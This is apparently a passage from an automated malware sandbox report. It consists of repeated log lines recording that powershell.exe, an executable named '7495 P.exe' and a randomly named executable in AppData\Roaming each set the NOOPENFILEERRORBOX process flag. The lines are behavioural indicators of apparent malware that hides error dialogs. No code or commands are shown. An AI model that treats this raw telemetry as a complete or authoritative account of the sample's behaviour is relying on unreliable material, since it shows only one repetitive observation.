                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
